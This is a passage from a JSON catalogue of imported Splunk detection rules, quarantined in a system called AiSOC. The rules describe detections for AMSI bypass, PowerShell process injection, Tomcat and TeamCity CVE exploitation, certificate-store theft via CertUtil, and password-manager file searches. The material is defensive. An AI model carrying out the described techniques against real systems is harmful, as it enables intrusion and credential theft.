"splunk/security_content", "source_id": "a1b2c3d4-e5f6-4789-a012-3456789abcde", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_bitdefender_submission_wizard_dll_sideloading.yml" } }, { "id": "splunk-security-content-a1c5a85e-a162-410c-a5d9-99ff639e5a52", "type": "detection", "name": "GCP Detect gcploit framework", "description": "The following analytic identifies the use of the GCPloit exploitation framework within Google Cloud Platform (GCP). It detects specific GCP Pub/Sub messages with a function timeout of 539 seconds, which is indicative of GCPloit activity. This detection is significant as GCPloit can be used to escalate privileges and facilitate lateral movement from compromised high-privilege accounts. If confirmed malicious, this activity could allow attackers to gain unauthorized access, escalate their privileges, and move laterally within the GCP environment, potentially compromising sensitive data and critical resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gcp-detect-gcploit-framework.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a1c5a85e-a162-410c-a5d9-99ff639e5a52", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gcp_detect_gcploit_framework.yml" } }, { "id": 
"splunk-security-content-a1d8f5c3-9b7e-4f2d-8c51-3bca5e672410", "type": "detection", "name": "Tomcat Session File Upload Attempt", "description": "This detection identifies potential exploitation of CVE-2025-24813 in Apache Tomcat through the initial stage of the attack. This first phase occurs when an attacker attempts to upload a malicious serialized Java object with a .session file extension via an HTTP PUT request. When successful, these uploads typically result in HTTP status codes 201 (Created) or 409 (Conflict) and create the foundation for subsequent deserialization attacks by placing malicious content in a location where Tomcat's session management can access it.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/tomcat-session-file-upload-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a1d8f5c3-9b7e-4f2d-8c51-3bca5e672410", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/tomcat_session_file_upload_attempt.yml" } }, { "id": "splunk-security-content-a1e68dcd-2e24-4434-bd0e-b3d4de139d58", "type": "detection", "name": "JetBrains TeamCity Limited Auth Bypass Suricata CVE-2024-27199", "description": "The following analytic identifies attempts to exploit CVE-2024-27199, a critical vulnerability in JetBrains TeamCity web server, allowing unauthenticated access to specific endpoints. 
It detects unusual access patterns to vulnerable paths such as /res/, /update/, and /.well-known/acme-challenge/ by monitoring HTTP traffic logs via Suricata. This activity is significant as it could indicate an attacker bypassing authentication to access or modify system settings. If confirmed malicious, this could lead to unauthorized changes, disclosure of sensitive information, or uploading of malicious certificates, severely compromising the server's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/jetbrains-teamcity-limited-auth-bypass-suricata-cve-2024-27199.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a1e68dcd-2e24-4434-bd0e-b3d4de139d58", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/jetbrains_teamcity_limited_auth_bypass_suricata_cve_2024_27199.yml" } }, { "id": "splunk-security-content-a1e761ac-1344-4dbd-88b2-3f34c912d359", "type": "detection", "name": "Detect hosts connecting to dynamic domain providers", "description": "The following analytic identifies DNS queries from internal hosts to dynamic domain providers. It leverages DNS query logs from the `Network_Resolution` data model and cross-references them with a lookup file containing known dynamic DNS providers. This activity is significant because attackers often use dynamic DNS services to host malicious payloads or command-and-control servers, making it crucial for security teams to monitor. 
If confirmed malicious, this activity could allow attackers to bypass firewall blocks, evade detection, and maintain persistent access to the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1189" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-hosts-connecting-to-dynamic-domain-providers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a1e761ac-1344-4dbd-88b2-3f34c912d359", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_hosts_connecting_to_dynamic_domain_providers.yml" } }, { "id": "splunk-security-content-a203040e-f8fd-49bb-8424-d2fabf277322", "type": "detection", "name": "Windows ConsoleHost History File Deletion", "description": "The following analytic detects the deletion of the ConsoleHost_history.txt file, which stores command history for PowerShell sessions. Attackers may attempt to remove this file to cover their tracks and evade detection during post-exploitation activities. This detection focuses on file deletion commands executed via PowerShell, Command Prompt, or scripting languages that specifically target ConsoleHost_history.txt, typically located at %APPDATA%\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt. 
Identifying such activity can help uncover potential anti-forensic behavior and suspicious administrative actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-consolehost-history-file-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a203040e-f8fd-49bb-8424-d2fabf277322", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_consolehost_history_file_deletion.yml" } }, { "id": "splunk-security-content-a21e3484-c94d-11eb-b55b-acde48001122", "type": "detection", "name": "Unloading AMSI via Reflection", "description": "The following analytic detects the tampering of AMSI (Antimalware Scan Interface) via PowerShell reflection. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze suspicious PowerShell commands, specifically those involving `system.management.automation.amsi`. This activity is significant as it indicates an attempt to bypass AMSI, a critical security feature that helps detect and block malicious scripts. 
If confirmed malicious, this could allow an attacker to execute harmful code undetected, leading to potential system compromise and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/unloading-amsi-via-reflection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a21e3484-c94d-11eb-b55b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/unloading_amsi_via_reflection.yml" } }, { "id": "splunk-security-content-a2276412-e254-4e9a-9082-4d92edb6a3e0", "type": "detection", "name": "Windows Modify Registry NoChangingWallPaper", "description": "The following analytic detects modifications to the Windows registry aimed at preventing wallpaper changes. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the \"NoChangingWallPaper\" registry value. This activity is significant as it is a known tactic used by Rhysida ransomware to enforce a malicious wallpaper, thereby limiting user control over system settings. 
If confirmed malicious, this registry change could indicate a ransomware infection, leading to further system compromise and user disruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-nochangingwallpaper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a2276412-e254-4e9a-9082-4d92edb6a3e0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_nochangingwallpaper.yml" } }, { "id": "splunk-security-content-a258bf2a-34fd-4986-8086-78f506e00206", "type": "detection", "name": "Windows Alternate DataStream - Executable Content", "description": "The following analytic detects the writing of data with an IMPHASH value to an Alternate Data Stream (ADS) in the NTFS file system. It leverages Sysmon Event ID 15 and regex to identify files with a Portable Executable (PE) structure. This activity is significant as it may indicate a threat actor staging malicious code in hidden areas for persistence or future execution. 
If confirmed malicious, this could allow attackers to execute hidden code, maintain persistence, or escalate privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-alternate-datastream-executable-content.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a258bf2a-34fd-4986-8086-78f506e00206", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_alternate_datastream___executable_content.yml" } }, { "id": "splunk-security-content-a2625034-c2de-44fc-b45c-7bac9c4a7974", "type": "detection", "name": "ASL AWS Network Access Control List Created with All Open Ports", "description": "The following analytic detects the creation of AWS Network Access Control Lists (ACLs) with all ports open to a specified CIDR. It leverages AWS CloudTrail events, specifically monitoring for `CreateNetworkAclEntry` or `ReplaceNetworkAclEntry` actions with rules allowing all traffic. This activity is significant because it can expose the network to unauthorized access, increasing the risk of data breaches and other malicious activities. 
If confirmed malicious, an attacker could exploit this misconfiguration to gain unrestricted access to the network, potentially leading to data exfiltration, service disruption, or further compromise of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-network-access-control-list-created-with-all-open-ports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a2625034-c2de-44fc-b45c-7bac9c4a7974", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_network_access_control_list_created_with_all_open_ports.yml" } }, { "id": "splunk-security-content-a26d9db4-c883-11eb-9d75-acde48001122", "type": "detection", "name": "Powershell Fileless Process Injection via GetProcAddress", "description": "The following analytic detects the use of `GetProcAddress` in PowerShell script blocks, leveraging PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, which is then logged in Windows event logs. The presence of `GetProcAddress` is unusual for typical PowerShell scripts and often indicates malicious activity, as many attack toolkits use it to achieve code execution. If confirmed malicious, this activity could allow an attacker to execute arbitrary code, potentially leading to system compromise. 
Analysts should review parallel processes and the entire logged script block for further investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-fileless-process-injection-via-getprocaddress.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a26d9db4-c883-11eb-9d75-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_fileless_process_injection_via_getprocaddress.yml" } }, { "id": "splunk-security-content-a27db3c5-1a9a-46df-a577-765d3f1a3c24", "type": "detection", "name": "Windows MSIExec Unregister DLLRegisterServer", "description": "The following analytic detects the use of msiexec.exe with the /z switch parameter, which is used to unload DLLRegisterServer. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs, including command-line arguments. This activity is significant because unloading DLLRegisterServer can be indicative of an attempt to deregister a DLL, potentially disrupting legitimate services or hiding malicious activity. 
If confirmed malicious, this could allow an attacker to disable security controls, evade detection, or disrupt system functionality, leading to further compromise of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msiexec-unregister-dllregisterserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a27db3c5-1a9a-46df-a577-765d3f1a3c24", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msiexec_unregister_dllregisterserver.yml" } }, { "id": "splunk-security-content-a28f0bc3-3400-4a6e-a2da-89b9e95f0d2a", "type": "detection", "name": "Azure AD Privileged Role Assigned", "description": "The following analytic detects the assignment of privileged Azure Active Directory roles to a user. It leverages Azure AD audit logs, specifically monitoring the \"Add member to role\" operation. This activity is significant as adversaries may assign privileged roles to compromised accounts to maintain persistence within the Azure AD environment. 
If confirmed malicious, this could allow attackers to escalate privileges, access sensitive information, and maintain long-term control over the Azure AD infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-privileged-role-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a28f0bc3-3400-4a6e-a2da-89b9e95f0d2a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_privileged_role_assigned.yml" } }, { "id": "splunk-security-content-a2b1f1ef-221f-4187-b2a4-d4b08ec745f4", "type": "detection", "name": "Windows Vulnerable Driver Loaded", "description": "The following analytic detects the loading of known vulnerable Windows drivers, which may indicate potential persistence or privilege escalation attempts. It leverages Sysmon EventCode 6 to identify driver loading events and cross-references them with a list of vulnerable drivers. This activity is significant as attackers often exploit vulnerable drivers to gain elevated privileges or maintain persistence on a system. 
If confirmed malicious, this could allow attackers to execute arbitrary code with high privileges, leading to further system compromise and potential data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-vulnerable-driver-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a2b1f1ef-221f-4187-b2a4-d4b08ec745f4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_vulnerable_driver_loaded.yml" } }, { "id": "splunk-security-content-a2c8e8f8-18d6-4ad4-acf4-f58903bebe41", "type": "detection", "name": "Windows NirSoft Tool Bundle File Created", "description": "The following analytic detects the creation of files associated with the NirSoft tool bundles on Windows endpoints. NirSoft is a well-known provider of free, portable utilities that can be used for various system and network tasks. 
However, threat actors often leverage these tools for malicious purposes, such as credential harvesting, network reconnaissance, and data exfiltration. The detection focuses on the creation of specific NirSoft tool bundle files, which may indicate that an attacker is preparing to use these utilities on a compromised system. Security teams should investigate any instances of these files being created, especially if they are found in unexpected locations or on systems that should not be using such tools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-nirsoft-tool-bundle-file-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a2c8e8f8-18d6-4ad4-acf4-f58903bebe41", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_nirsoft_tool_bundle_file_created.yml" } }, { "id": "splunk-security-content-a2f4cc7f-6503-4078-b206-f83a29f408a7", "type": "detection", "name": "Windows Steal Authentication Certificates CS Backup", "description": "The following analytic identifies the backup of the Active Directory Certificate Services (AD CS) store, detected via Event ID 4876. This event is logged when a backup is performed using the CertSrv.msc UI or the CertUtil.exe -BackupDB command. Monitoring this activity is crucial as unauthorized backups can indicate an attempt to steal authentication certificates, which are critical for secure communications. 
If confirmed malicious, this activity could allow an attacker to impersonate users, escalate privileges, or access sensitive information, severely compromising the security of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-cs-backup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a2f4cc7f-6503-4078-b206-f83a29f408a7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates_cs_backup.yml" } }, { "id": "splunk-security-content-a3148fad-3734-4b7f-9a71-62f08d39fab1", "type": "detection", "name": "Windows Office Product Spawned MSDT", "description": "The following analytic detects a Microsoft Office product spawning the Windows msdt.exe process. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where Office applications are the parent process. This activity is significant as it may indicate an attempt to exploit protocol handlers to bypass security controls, even if macros are disabled. 
If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-spawned-msdt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a3148fad-3734-4b7f-9a71-62f08d39fab1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_spawned_msdt.yml" } }, { "id": "splunk-security-content-a345980a-417d-4ed3-9fb4-cac30c9405a0", "type": "detection", "name": "Windows USBSTOR Registry Key Modification", "description": "This analytic is used to identify when a USB removable media device is attached to a Windows host. The detection queries the Endpoint Registry data model for modifications to the HKLM\\System\\CurrentControlSet\\Enum\\USBSTOR\\ key. 
Adversaries and Insider Threats may use removable media devices for several malicious activities, including initial access, execution, and exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200", "T1025", "T1091" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-usbstor-registry-key-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a345980a-417d-4ed3-9fb4-cac30c9405a0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_usbstor_registry_key_modification.yml" } }, { "id": "splunk-security-content-a34aae96-ccf8-4aef-952c-3ea21444444d", "type": "detection", "name": "System Processes Run From Unexpected Locations", "description": "The following analytic identifies system processes running from unexpected locations outside of paths such as `C:\\Windows\\System32\\` or `C:\\Windows\\SysWOW64`. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process paths, names, and hashes. This activity is significant as it may indicate a malicious process attempting to masquerade as a legitimate system process. 
If confirmed malicious, this behavior could allow an attacker to execute code, escalate privileges, or maintain persistence within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/system-processes-run-from-unexpected-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a34aae96-ccf8-4aef-952c-3ea21444444d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/system_processes_run_from_unexpected_locations.yml" } }, { "id": "splunk-security-content-a34e65d0-54de-4b02-9db8-5a04522067f6", "type": "detection", "name": "O365 Multiple Service Principals Created by User", "description": "The following analytic identifies instances where a single user creates more than three unique OAuth applications within a 10-minute window in the Office 365 environment. It leverages O365 logs from the Unified Audit Log, focusing on the 'Add service principal' operation in Azure Active Directory. This activity is significant as it may indicate a compromised user account or unauthorized actions, potentially leading to broader network infiltration or privilege escalation. 
If confirmed malicious, this behavior could allow attackers to gain persistent access, escalate privileges, or exfiltrate sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-multiple-service-principals-created-by-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a34e65d0-54de-4b02-9db8-5a04522067f6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_multiple_service_principals_created_by_user.yml" } }, { "id": "splunk-security-content-a360d2b2-065a-11ec-b0bf-acde48001122", "type": "detection", "name": "Get DomainPolicy with Powershell Script Block", "description": "The following analytic detects the execution of the `Get-DomainPolicy` cmdlet using PowerShell Script Block Logging (EventCode=4104). It leverages logs capturing script block text to identify attempts to obtain the password policy in a Windows domain. This activity is significant as it indicates potential reconnaissance efforts by adversaries or Red Teams to gather domain policy information, which is crucial for planning further attacks. 
If confirmed malicious, this behavior could lead to detailed knowledge of domain security settings, aiding in privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-domainpolicy-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a360d2b2-065a-11ec-b0bf-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_domainpolicy_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-a36972c8-b894-11eb-9f78-acde48001122", "type": "detection", "name": "Mailsniper Invoke functions", "description": "The following analytic detects the execution of known MailSniper PowerShell functions on a machine. It leverages PowerShell logs (EventCode 4104) to identify specific script block text associated with MailSniper activities. This behavior is significant as MailSniper is often used by attackers to harvest sensitive emails from compromised Exchange servers. 
If confirmed malicious, this activity could lead to unauthorized access to sensitive email data, credential theft, and further compromise of the email infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mailsniper-invoke-functions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a36972c8-b894-11eb-9f78-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/mailsniper_invoke_functions.yml" } }, { "id": "splunk-security-content-a3b3bc96-1c4f-4eba-8218-027cac739a48", "type": "detection", "name": "Windows Password Managers Discovery", "description": "The following analytic identifies command-line activity that searches for files related to password manager software, such as \"*.kdbx*\" and \"*credential*\". It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant because attackers often target password manager databases to extract stored credentials, which can be used for further exploitation. 
If confirmed malicious, this behavior could lead to unauthorized access to sensitive information, enabling attackers to escalate privileges, move laterally, or exfiltrate critical data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-password-managers-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a3b3bc96-1c4f-4eba-8218-027cac739a48", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_password_managers_discovery.yml" } }, { "id": "splunk-security-content-a3bddf71-6ba3-42ab-a6b2-396929b16d92", "type": "detection", "name": "Linux Composer Privilege Escalation", "description": "The following analytic detects the execution of the Composer tool with elevated privileges on a Linux system. It identifies instances where Composer is run with the 'sudo' command, allowing the user to execute system commands as root. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant because it can indicate an attempt to escalate privileges, potentially leading to unauthorized root access. 
If confirmed malicious, an attacker could gain full control over the system, execute arbitrary commands, and compromise sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-composer-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a3bddf71-6ba3-42ab-a6b2-396929b16d92", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_composer_privilege_escalation.yml" } }, { "id": "splunk-security-content-a3d1df37-c2a9-41d0-aa8f-59f82d6192a8", "type": "detection", "name": "Okta User Logins from Multiple Cities", "description": "The following analytic identifies instances where the same Okta user logs in from different cities within a 24-hour period. This detection leverages Okta Identity Management logs, analyzing login events and their geographic locations. Such behavior is significant as it may indicate a compromised account, with an attacker attempting unauthorized access from multiple locations. 
